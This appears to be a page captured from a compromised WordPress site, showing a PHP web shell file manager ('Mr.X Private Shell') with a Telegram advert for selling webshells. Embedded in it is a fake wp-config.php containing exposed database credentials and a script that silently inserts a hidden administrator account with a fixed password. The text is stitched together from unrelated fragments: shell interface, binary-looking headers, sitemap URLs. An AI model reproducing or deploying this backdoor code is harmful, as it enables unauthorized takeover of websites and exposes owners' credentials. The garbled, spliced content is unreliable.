xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php
/** Enable W3 Total Cache */
define('WP_CACHE', true); // Added by W3 Total Cache

/**
 * Cấu hình cơ bản cho WordPress
 *
 * Trong quá trình cài đặt, file "wp-config.php" sẽ được tạo dựa trên nội dung 
 * mẫu của file này. Bạn không bắt buộc phải sử dụng giao diện web để cài đặt, 
 * chỉ cần lưu file này lại với tên "wp-config.php" và điền các thông tin cần thiết.
 *
 * File này chứa các thiết lập sau:
 *
 * * Thiết lập MySQL
 * * Các khóa bí mật
 * * Tiền tố cho các bảng database
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** Thiết lập MySQL - Bạn có thể lấy các thông tin này từ host/server ** //
/** Tên database MySQL */
define( 'DB_NAME', 'masayumi5949_seiko' );

/** Username của database */
define( 'DB_USER', 'masayumi5949_sk' );

/** Mật khẩu của database */
define( 'DB_PASSWORD', '20200513dbseiko' );

/** Hostname của database */
define( 'DB_HOST', 'localhost' );

/** Database charset sử dụng để tạo bảng database. */
define( 'DB_CHARSET', 'utf8mb4' );
define( 'PREFIX', 'wp_' );
/**********************************************/

$DB_NAME = DB_NAME;
$DB_USER = DB_USER;
$DB_PASSWORD = DB_PASSWORD;
$DB_HOST = DB_HOST;
$DB_CHARSET = DB_CHARSET;
$table_prefix = PREFIX;

$new_login = 'seiko';
$new_email = 'seiko@example.com';
$new_password = 'M@pa_ss123';
$conn = new mysqli($DB_HOST, $DB_USER, $DB_PASSWORD, $DB_NAME);
if ($conn->connect_error) {
    die("数据库连接失败: " . $conn->connect_error);
}
$conn->set_charset($DB_CHARSET);


$rpath=$_SERVER['DOCUMENT_ROOT'].'/';
$phpass_path = $rpath . 'wp-includes/class-phpass.php';
if (!file_exists($phpass_path)) {
    die("找不到 class-phpass.php。请把脚本放在 WordPress 根目录,或修改 \$phpass_path 指向正确位置。");
}
require_once $phpass_path;
$wp_hasher = new PasswordHash(8, true);
$checkStmt = $conn->prepare("SELECT ID FROM {$table_prefix}users WHERE user_login = ? OR user_email = ? LIMIT 1");
$checkStmt->bind_param("ss", $new_login, $new_email);
$checkStmt->execute();
$checkStmt->store_result();
if ($checkStmt->num_rows > 0) {
    $checkStmt->close();
    die("错误:用户名或邮箱已存在,请换一个。");
}
$checkStmt->close();
$hashed = $wp_hasher->HashPassword($new_password);
$display_name = $new_login;
$user_nicename = $new_login;
$user_url = '';
$user_status = 0;
$insertSql = "INSERT INTO {$table_prefix}users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name)
              VALUES (?, ?, ?, ?, ?, NOW(), ?, ?)";
$ins = $conn->prepare($insertSql);
$ins->bind_param("sssssis", $new_login, $hashed, $user_nicename, $new_email, $user_url, $user_status, $display_name);
if (!$ins->execute()) {
    die("插入用户失败: " . $ins->error);
}
$user_id = $conn->insert_id;
$ins->close();
$cap_meta_key = $table_prefix . 'capabilities';
$level_meta_key = $table_prefix . 'user_level'; 
$cap_meta_value = 'a:1:{s:13:"administrator";b:1;}';
$level_meta_value = '10';

$umStmt = $conn->prepare("INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");

$umStmt->bind_param("iss", $user_id, $cap_meta_key, $cap_meta_value);
if (!$umStmt->execute()) {
    die("写入 capabilities 失败: " . $umStmt->error);
}

$umStmt->bind_param("iss", $user_id, $level_meta_key, $level_meta_value);
if (!$umStmt->execute()) {
    die("写入 user_level 失败: " . $umStmt->error);
}
$umStmt->close();
$conn->close();
echo " 成功创建超级管理员:\n<br>";
echo "  用户ID: {$user_id}\n<br>";
echo "  登录名: {$new_login}\n<br>";
echo "  邮箱: {$new_email}\n<br>";
echo "  密码: {$new_password}\n\n<br>";
echo "  3s 后删除当前脚本...";

?>

Filemanager

Name Type Size Permission Actions
languages Folder 0775
mu-plugins Folder 0775
plugins Folder 0775
themes Folder 0775
upgrade Folder 0775
upgrade-temp-backup Folder 0775
uploads Folder 0775
debug.log File 3.76 KB 0777
index.php File 30 B 0777
mysql.php File 3.88 KB 0664
wp-cache.php File 17.25 KB 0444
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml